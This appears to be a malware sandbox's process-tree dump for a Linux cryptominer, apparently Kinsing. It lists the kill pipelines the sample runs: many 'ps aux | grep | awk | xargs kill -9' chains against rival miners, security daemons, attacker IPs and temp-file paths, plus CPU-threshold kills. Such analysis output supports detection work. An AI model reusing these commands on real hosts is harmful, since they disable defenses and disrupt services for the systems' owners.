/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1820
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1819
-
/bin/grepgrep :144332⤵PID:1818
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1828 -
/bin/grepgrep -v -2⤵PID:1827
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1826
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1825
-
/bin/grepgrep :135312⤵PID:1824
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1830
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1829
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1832
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1831
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1834
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1833
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1836
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1835
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1838
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1837
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1840 -
/bin/catcat /data/./oka.pid2⤵PID:1839
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
PID:1841 -
/usr/bin/pkillpkill -f pdefenderd2⤵PID:1842
-
/usr/bin/pkillpkill -f updatecheckerd2⤵PID:1843
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1848 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1847
-
/bin/grepgrep -v grep2⤵PID:1846
-
/bin/grepgrep ./oka2⤵PID:1845
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1844 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1853
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1852
-
/bin/grepgrep -v grep2⤵PID:1851
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1850
-
/bin/psps aux2⤵
- Process Discovery
PID:1849 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1865 -
/bin/grepgrep -v kinsing2⤵PID:1863
-
/bin/grepgrep -v postgres2⤵PID:1861
-
/bin/grepgrep -v postgrey2⤵PID:1862
-
/bin/grepgrep -v proxymap2⤵PID:1860
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1864
-
/bin/grepgrep -v php-fpm2⤵PID:1859
-
/bin/grepgrep -v "("2⤵PID:1858
-
/bin/grepgrep -v "\\["2⤵PID:1857
-
/bin/grepgrep -v bin2⤵PID:1856
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1855
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads runtime system information
PID:1854 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1876
-
/usr/local/sbin/killkill -9 12743⤵PID:1877
-
/usr/local/bin/killkill -9 12743⤵PID:1877
-
/usr/sbin/killkill -9 12743⤵PID:1877
-
/usr/bin/killkill -9 12743⤵PID:1877
-
/sbin/killkill -9 12743⤵PID:1877
-
/bin/killkill -9 12743⤵PID:1877
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1875
-
/bin/grepgrep -v postgres2⤵PID:1873
-
/bin/grepgrep -v postgrey2⤵PID:1874
-
/bin/grepgrep -v proxymap2⤵PID:1872
-
/bin/grepgrep -v php-fpm2⤵PID:1871
-
/bin/grepgrep -v "("2⤵PID:1870
-
/bin/grepgrep -v "\\["2⤵PID:1869
-
/bin/grepgrep -v bin2⤵PID:1868
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1867
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1866 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1888
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1887
-
/bin/grepgrep -v postgrey2⤵PID:1886
-
/bin/grepgrep -v postgres2⤵PID:1885
-
/bin/grepgrep -v proxymap2⤵PID:1884
-
/bin/grepgrep -v php-fpm2⤵PID:1883
-
/bin/grepgrep -v "("2⤵PID:1882
-
/bin/grepgrep -v "\\["2⤵PID:1881
-
/bin/grepgrep -v bin2⤵PID:1880
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1879
-
/bin/psps ax2⤵PID:1878
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1893 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1892
-
/bin/grepgrep /tmp/sscks2⤵PID:1891
-
/bin/grepgrep -v grep2⤵PID:1890
-
/bin/psps aux2⤵PID:1889
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1898 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1897
-
/bin/grepgrep -v grep2⤵PID:1896
-
/bin/grepgrep "sleep 60"2⤵PID:1895
-
/bin/psps aux2⤵PID:1894
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1903
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1902
-
/bin/grepgrep -v grep2⤵PID:1901
-
/bin/grepgrep ./crun2⤵PID:1900
-
/bin/psps aux2⤵
- Process Discovery
PID:1899 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1908
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1907
-
/bin/grepgrep -v grep2⤵PID:1906
-
/bin/grepgrep -vw kdevtmpfsi2⤵PID:1905
-
/bin/psps aux2⤵PID:1904
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1913 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1912
-
/bin/grepgrep :33332⤵PID:1911
-
/bin/grepgrep -v grep2⤵PID:1910
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1909 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1918
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1917
-
/bin/grepgrep :55552⤵PID:1916
-
/bin/grepgrep -v grep2⤵PID:1915
-
/bin/psps aux2⤵
- Process Discovery
PID:1914 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1923 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1922
-
/bin/grepgrep "kworker -c\\"2⤵PID:1921
-
/bin/grepgrep -v grep2⤵PID:1920
-
/bin/psps aux2⤵PID:1919
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1928 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1927
-
/bin/grepgrep log_2⤵PID:1926
-
/bin/grepgrep -v grep2⤵PID:1925
-
/bin/psps aux2⤵PID:1924
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1933
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1932
-
/bin/grepgrep systemten2⤵PID:1931
-
/bin/grepgrep -v grep2⤵PID:1930
-
/bin/psps aux2⤵
- Process Discovery
PID:1929 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1938 -
/usr/local/sbin/killkill -9 143⤵PID:1939
-
/usr/local/bin/killkill -9 143⤵PID:1939
-
/usr/sbin/killkill -9 143⤵PID:1939
-
/usr/bin/killkill -9 143⤵PID:1939
-
/sbin/killkill -9 143⤵PID:1939
-
/bin/killkill -9 143⤵PID:1939
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1937
-
/bin/grepgrep netns2⤵PID:1936
-
/bin/grepgrep -v grep2⤵PID:1935
-
/bin/psps aux2⤵PID:1934
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1944 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1943
-
/bin/grepgrep voltuned2⤵PID:1942
-
/bin/grepgrep -v grep2⤵PID:1941
-
/bin/psps aux2⤵PID:1940
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1949
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1948
-
/bin/grepgrep darwin2⤵PID:1947
-
/bin/grepgrep -v grep2⤵PID:1946
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1945 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1954
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1953
-
/bin/grepgrep /tmp/dl2⤵PID:1952
-
/bin/grepgrep -v grep2⤵PID:1951
-
/bin/psps aux2⤵
- Process Discovery
PID:1950 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1959 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1958
-
/bin/grepgrep /tmp/ddg2⤵PID:1957
-
/bin/grepgrep -v grep2⤵PID:1956
-
/bin/psps aux2⤵PID:1955
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1964
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1963
-
/bin/grepgrep /tmp/pprt2⤵PID:1962
-
/bin/grepgrep -v grep2⤵PID:1961
-
/bin/psps aux2⤵PID:1960
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1969
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1968
-
/bin/grepgrep /tmp/ppol2⤵PID:1967
-
/bin/grepgrep -v grep2⤵PID:1966
-
/bin/psps aux2⤵PID:1965
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1974
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1973
-
/bin/grepgrep "/tmp/65ccE*"2⤵PID:1972
-
/bin/grepgrep -v grep2⤵PID:1971
-
/bin/psps aux2⤵
- Process Discovery
PID:1970 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1979
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1978
-
/bin/grepgrep "/tmp/jmx*"2⤵PID:1977
-
/bin/grepgrep -v grep2⤵PID:1976
-
/bin/psps aux2⤵
- Process Discovery
PID:1975 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1984
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1983
-
/bin/grepgrep "/tmp/2Ne80*"2⤵PID:1982
-
/bin/grepgrep -v grep2⤵PID:1981
-
/bin/psps aux2⤵
- Process Discovery
PID:1980 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1989 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1988
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵PID:1987
-
/bin/grepgrep -v grep2⤵PID:1986
-
/bin/psps aux2⤵PID:1985
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1994
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1993
-
/bin/grepgrep 45.76.122.922⤵PID:1992
-
/bin/grepgrep -v grep2⤵PID:1991
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1990 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1999
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1998
-
/bin/grepgrep 51.38.191.1782⤵PID:1997
-
/bin/grepgrep -v grep2⤵PID:1996
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1995 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2004
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2003
-
/bin/grepgrep 51.15.56.1612⤵PID:2002
-
/bin/grepgrep -v grep2⤵PID:2001
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2000 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2009
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2008
-
/bin/grepgrep 86s.jpg2⤵PID:2007
-
/bin/grepgrep -v grep2⤵PID:2006
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2005 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2014
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2013
-
/bin/grepgrep aGTSGJJp2⤵PID:2012
-
/bin/grepgrep -v grep2⤵PID:2011
-
/bin/psps aux2⤵PID:2010
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2019 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2018
-
/bin/grepgrep nMrfmnRa2⤵PID:2017
-
/bin/grepgrep -v grep2⤵PID:2016
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2015 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2024
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2023
-
/bin/grepgrep PuNY5tm22⤵PID:2022
-
/bin/grepgrep -v grep2⤵PID:2021
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2020 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2029
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2028
-
/bin/grepgrep I0r8Jyyt2⤵PID:2027
-
/bin/grepgrep -v grep2⤵PID:2026
-
/bin/psps aux2⤵PID:2025
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2034 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2033
-
/bin/grepgrep AgdgACUD2⤵PID:2032
-
/bin/grepgrep -v grep2⤵PID:2031
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2030 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2039
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2038
-
/bin/grepgrep uiZvwxG82⤵PID:2037
-
/bin/grepgrep -v grep2⤵PID:2036
-
/bin/psps aux2⤵
- Process Discovery
PID:2035 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2044
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2043
-
/bin/grepgrep hahwNEdB2⤵PID:2042
-
/bin/grepgrep -v grep2⤵PID:2041
-
/bin/psps aux2⤵
- Process Discovery
PID:2040 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2049 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2048
-
/bin/grepgrep BtwXn5qH2⤵PID:2047
-
/bin/grepgrep -v grep2⤵PID:2046
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2045 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2054
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2053
-
/bin/grepgrep 3XEzey2T2⤵PID:2052
-
/bin/grepgrep -v grep2⤵PID:2051
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2050 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2059 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2058
-
/bin/grepgrep t2tKrCSZ2⤵PID:2057
-
/bin/grepgrep -v grep2⤵PID:2056
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2055 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2064
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2063
-
/bin/grepgrep HD7fcBgg2⤵PID:2062
-
/bin/grepgrep -v grep2⤵PID:2061
-
/bin/psps aux2⤵
- Process Discovery
PID:2060 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2069
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2068
-
/bin/grepgrep zXcDajSs2⤵PID:2067
-
/bin/grepgrep -v grep2⤵PID:2066
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2065 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2074
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2073
-
/bin/grepgrep 3lmigMo2⤵PID:2072
-
/bin/grepgrep -v grep2⤵PID:2071
-
/bin/psps aux2⤵
- Process Discovery
PID:2070 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2079
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2078
-
/bin/grepgrep AkMK4A22⤵PID:2077
-
/bin/grepgrep -v grep2⤵PID:2076
-
/bin/psps aux2⤵PID:2075
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2084
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2083
-
/bin/grepgrep AJ2AkKe2⤵PID:2082
-
/bin/grepgrep -v grep2⤵PID:2081
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2080 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2089
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2088
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
PID:2087 -
/bin/grepgrep -v grep2⤵PID:2086
-
/bin/psps aux2⤵
- Process Discovery
PID:2085 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2094
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2093
-
/bin/grepgrep http_0xCC0302⤵PID:2092
-
/bin/grepgrep -v grep2⤵PID:2091
-
/bin/psps aux2⤵
- Process Discovery
PID:2090 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2099
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2098
-
/bin/grepgrep http_0xCC0312⤵PID:2097
-
/bin/grepgrep -v grep2⤵PID:2096
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2095 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2104
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2103
-
/bin/grepgrep http_0xCC0322⤵PID:2102
-
/bin/grepgrep -v grep2⤵PID:2101
-
/bin/psps aux2⤵
- Process Discovery
PID:2100 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2109
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2108
-
/bin/grepgrep http_0xCC0332⤵PID:2107
-
/bin/grepgrep -v grep2⤵PID:2106
-
/bin/psps aux2⤵PID:2105
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2114
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2113
-
/bin/grepgrep C4iLM4L2⤵PID:2112
-
/bin/grepgrep -v grep2⤵PID:2111
-
/bin/psps aux2⤵
- Process Discovery
PID:2110 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2119 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2118
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:2117 -
/bin/grepgrep -v grep2⤵PID:2116
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2115 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2123
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:2122
-
/bin/grepgrep -v grep2⤵PID:2121
-
/bin/psps aux2⤵PID:2120
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2128
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2127
-
/bin/grepgrep /boot/vmlinuz2⤵PID:2126
-
/bin/grepgrep -v grep2⤵PID:2125
-
/bin/psps aux2⤵PID:2124
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2133
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2132
-
/bin/grepgrep i4b503a52cc52⤵PID:2131
-
/bin/grepgrep -v grep2⤵PID:2130
-
/bin/psps aux2⤵PID:2129
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2138 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2137
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:2136
-
/bin/grepgrep -v grep2⤵PID:2135
-
/bin/psps aux2⤵
- Process Discovery
PID:2134 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2143 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2142
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:2141
-
/bin/grepgrep -v grep2⤵PID:2140
-
/bin/psps aux2⤵
- Process Discovery
PID:2139 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2148
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2147
-
/bin/grepgrep nqscheduler2⤵PID:2146
-
/bin/grepgrep -v grep2⤵PID:2145
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2144 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2153
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2152
-
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:2151
-
/bin/grepgrep -v grep2⤵PID:2150
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2149 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2159
-
/usr/local/sbin/killkill -9 15213⤵PID:2160
-
/usr/local/bin/killkill -9 15213⤵PID:2160
-
/usr/sbin/killkill -9 15213⤵PID:2160
-
/usr/bin/killkill -9 15213⤵PID:2160
-
/sbin/killkill -9 15213⤵PID:2160
-
/bin/killkill -9 15213⤵
- Reads CPU attributes
PID:2160 -
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:2158
-
/bin/grepgrep "]"2⤵PID:2157
-
/bin/grepgrep -v aux2⤵PID:2156
-
/bin/grepgrep -v grep2⤵PID:2155
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2154 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2165 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2164
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵PID:2163
-
/bin/grepgrep -v grep2⤵PID:2162
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2161 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2170
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2169
-
/bin/grepgrep 0kwti6ut420t2⤵PID:2168
-
/bin/grepgrep -v grep2⤵PID:2167
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2166 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2175
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2174
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵PID:2173
-
/bin/grepgrep -v grep2⤵PID:2172
-
/bin/psps aux2⤵PID:2171
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2182
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵PID:2181
-
/bin/grepgrep -v _2⤵PID:2180
-
/bin/grepgrep -v -2⤵PID:2179
-
/bin/grepgrep -v /2⤵PID:2178
-
/bin/grepgrep -v grep2⤵PID:2177
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2176 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2187
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2186
-
/bin/grepgrep "\\[^"2⤵PID:2185
-
/bin/grepgrep -v grep2⤵PID:2184
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2183 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2192
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2191
-
/bin/grepgrep rsync2⤵PID:2190
-
/bin/grepgrep -v grep2⤵PID:2189
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2188 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2197 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2196
-
/bin/grepgrep watchd0g2⤵PID:2195
-
/bin/grepgrep -v grep2⤵PID:2194
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2193 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2202 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2201
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/bin/grepgrep -v grep2⤵PID:2199
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2198 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2207
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2206
-
/bin/grepgrep 158.69.133.18:82202⤵PID:2205
-
/bin/grepgrep -v grep2⤵PID:2204
-
/bin/psps aux2⤵
- Process Discovery
PID:2203 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2212
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2211
-
/bin/grepgrep /tmp/java2⤵PID:2210
-
/bin/grepgrep -v grep2⤵PID:2209
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2208 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2217
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2216
-
/bin/grepgrep gitee.com2⤵PID:2215
-
/bin/grepgrep -v grep2⤵PID:2214
-
/bin/psps aux2⤵
- Process Discovery
PID:2213 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2222
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2221
-
/bin/grepgrep /tmp/java2⤵PID:2220
-
/bin/grepgrep -v grep2⤵PID:2219
-
/bin/psps aux2⤵
- Process Discovery
PID:2218 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2227 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2226
-
/bin/grepgrep 104.248.4.1622⤵PID:2225
-
/bin/grepgrep -v grep2⤵PID:2224
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2223 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2232 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2231
-
/bin/grepgrep 89.35.39.782⤵PID:2230
-
/bin/grepgrep -v grep2⤵PID:2229
-
/bin/psps aux2⤵PID:2228
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2237
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2236
-
/bin/grepgrep /dev/shm/z3.sh2⤵PID:2235
-
/bin/grepgrep -v grep2⤵PID:2234
-
/bin/psps aux2⤵PID:2233
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2242
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2241
-
/bin/grepgrep kthrotlds2⤵PID:2240
-
/bin/grepgrep -v grep2⤵PID:2239
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2238 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2247
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2246
-
/bin/grepgrep ksoftirqds2⤵PID:2245
-
/bin/grepgrep -v grep2⤵PID:2244
-
/bin/psps aux2⤵
- Process Discovery
PID:2243 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2252
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2251
-
/bin/grepgrep netdns2⤵PID:2250
-
/bin/grepgrep -v grep2⤵PID:2249
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2248 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2257
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2256
-
/bin/grepgrep watchdogs2⤵PID:2255
-
/bin/grepgrep -v grep2⤵PID:2254
-
/bin/psps aux2⤵PID:2253
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2269
-
/usr/bin/awkawk "\$3>80.0{print \$2}"2⤵PID:2268
-
/bin/grepgrep -v postgresq12⤵PID:2267
-
/bin/grepgrep -v atd2⤵PID:2265
-
/bin/grepgrep -v kdevtmpfsi2⤵PID:2266
-
/bin/grepgrep -v apache22⤵PID:2264
-
/bin/grepgrep -v dblaunched2⤵PID:2263
-
/bin/grepgrep -v dblaunchs2⤵PID:2262
-
/bin/grepgrep -v dblaunch2⤵PID:2261
-
/bin/grepgrep -v root2⤵PID:2260
-
/bin/grepgrep -v grep2⤵PID:2259
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2258 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2275
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2274
-
/bin/grepgrep " ps"2⤵PID:2273
-
/bin/grepgrep -v aux2⤵PID:2272
-
